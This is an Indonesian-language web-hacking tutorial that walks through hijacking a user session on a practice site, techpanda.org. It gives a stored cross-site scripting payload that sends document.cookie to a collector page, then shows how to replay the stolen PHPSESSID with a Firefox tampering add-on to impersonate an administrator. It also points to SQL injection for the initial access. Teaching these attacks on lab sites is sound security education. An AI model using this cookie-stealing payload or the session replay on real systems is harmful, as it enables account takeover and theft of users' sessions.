Lebih banyak orang memiliki akses ke internet dibandingkan sebelumnya. Hal ini mendorong banyak organisasi untuk mengembangkan aplikasi berbasis web yang dapat digunakan pengguna secara online untuk berinteraksi dengan organisasi. Kode aplikasi web yang ditulis dengan buruk dapat dieksploitasi untuk mendapatkan akses tidak sah ke data sensitif dan server web
Dalam tutorial ini Anda akan belajar cara meretas situs web, dan kami akan memperkenalkan Anda pada teknik peretasan aplikasi web dan tindakan balasan yang dapat Anda lakukan untuk melindungi diri dari serangan semacam itu.
Daftar Isi:
- Cara Meretas Situs Web
- Peniruan Identitas Sesi menggunakan add-on Firefox dan Tamper Data
- Apa itu web application? Apa itu Web Threats?
- Bagaimana cara melindungi Situs Web Anda dari peretasan?
- Ringkasan
Cara Meretas Situs Web
Dalam skenario praktis peretasan situs web ini, kami akan membajak sesi pengguna aplikasi web yang terletak di www.techpanda.org. Kami akan menggunakan skrip lintas situs untuk membaca id sesi cookie kemudian menggunakannya untuk meniru sesi pengguna yang sah.
Asumsi yang dibuat adalah penyerang mempunyai akses ke aplikasi web dan dia ingin membajak sesi pengguna lain yang menggunakan aplikasi yang sama. Tujuan dari serangan ini adalah untuk mendapatkan akses admin ke aplikasi web dengan asumsi akun akses penyerang terbatas.
Langkah 1) Buka URL http://www.techpanda.org/.
Untuk tujuan latihan, sangat disarankan untuk mendapatkan akses menggunakan SQL Injection. Lihat artikel ini untuk informasi lebih lanjut tentang cara melakukannya.
Langkah 2) Masukkan Detail Login.
Email loginnya adalah admin@google.com, kata sandinya adalah Kata Sandi1990.
Langkah 3) Periksa dasbor.
Jika Anda sudah berhasil login, maka Anda akan mendapatkan dashboard berikut
Langkah 4) Masukkan Konten Baru
Klik Tambah Kontak Baru dan Masukkan yang berikut ini sebagai nama depan
<a href=# onclick=\”document.location=\’http://techpanda.org/snatch_sess_id.php?c=\’+escape\(document.cookie\)\;\”>Dark</a>
Langkah 5) Tambahkan Javascript.
Kode di atas menggunakan JavaScript. Itu menambahkan hyperlink dengan acara onclick. Ketika pengguna yang tidak menaruh curiga mengklik link tersebut, event tersebut mengambil ID sesi cookie PHP dan mengirimkannya ke halaman merebut_sess_id.php bersama dengan id sesi di URL
Masukkan detail lainnya seperti yang ditunjukkan di bawah ini dan Klik Simpan Perubahan
Langkah 7) Periksa dasbor.
Dasbor Anda sekarang akan terlihat seperti layar berikut
Langkah 8) Periksa id sesi.
- Karena kode skrip lintas situs disimpan dalam database, maka akan dimuat setiap kali pengguna dengan hak akses login
- Misalkan administrator login dan mengklik hyperlink yang bertuliskan Gelap
- Dia akan mendapatkan jendela dengan id sesi yang ditampilkan di URL
Catatan: skrip mungkin mengirimkan nilai ke beberapa server jauh tempat PHPSESSID disimpan kemudian pengguna diarahkan kembali ke situs web seolah-olah tidak terjadi apa-apa.
Catatan: nilai yang Anda dapatkan mungkin berbeda dengan yang ada di tutorial hacking halaman web ini, namun konsepnya sama
Session Impersonation menggunakan add-on Firefox dan Tamper Data
Diagram alur di bawah ini menunjukkan langkah-langkah yang harus Anda ambil untuk menyelesaikan latihan ini.
- Anda memerlukan browser web Firefox untuk bagian ini dan add-on Tamper Data
- Buka Firefox dan instal add seperti yang ditunjukkan pada diagram di bawah
- Cari data tamper lalu klik install seperti gambar di atas
- Klik Terima dan Instal…
- Klik Restart sekarang ketika instalasi selesai
- Aktifkan bilah menu di Firefox jika tidak ditampilkan
- Klik pada menu tools lalu pilih Tamper Data seperti gambar di bawah ini
- Anda akan mendapatkan Jendela berikut. Catatan: Jika Windows tidak kosong, tekan tombol hapus
- Klik pada menu Mulai Tamper
- Beralih kembali ke browser web Firefox, ketik http://www.techpanda.org/dashboard.php lalu tekan tombol enter untuk memuat halaman
- Anda akan mendapatkan pop up berikut dari Tamper Data
- Jendela pop-up memiliki tiga (3) opsi. Opsi Tamper memungkinkan Anda mengubah informasi header HTTP sebelum dikirimkan ke server.
- Klik di atasnya
- Anda akan mendapatkan jendela berikut
- Salin ID sesi PHP yang Anda salin dari URL serangan dan tempelkan setelah tanda sama dengan. Nilai Anda sekarang akan terlihat seperti ini
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
- Klik tombol OK
- Anda akan mendapatkan jendela popup data Tamper lag
- Hapus centang pada kotak centang yang menanyakan Lanjutkan Tampering?
- Klik tombol kirim setelah selesai
- Anda seharusnya dapat melihat dashboard seperti yang ditunjukkan di bawah ini
Catatan: kami tidak login, kami meniru sesi login menggunakan nilai PHPSESSID yang kami ambil menggunakan skrip lintas situs
Ringkasan
- Aplikasi web didasarkan pada model server-klien. Sisi klien menggunakan browser web untuk mengakses sumber daya di server.
- Aplikasi web biasanya dapat diakses melalui internet. Hal ini membuat mereka rentan terhadap serangan.
- Ancaman aplikasi web termasuk Injeksi SQL, Injeksi Kode, XSS, Defacement, keracunan Cookie, dll.
- Kebijakan keamanan yang baik ketika mengembangkan aplikasi web dapat membantu mengamankannya.
Blogger Comment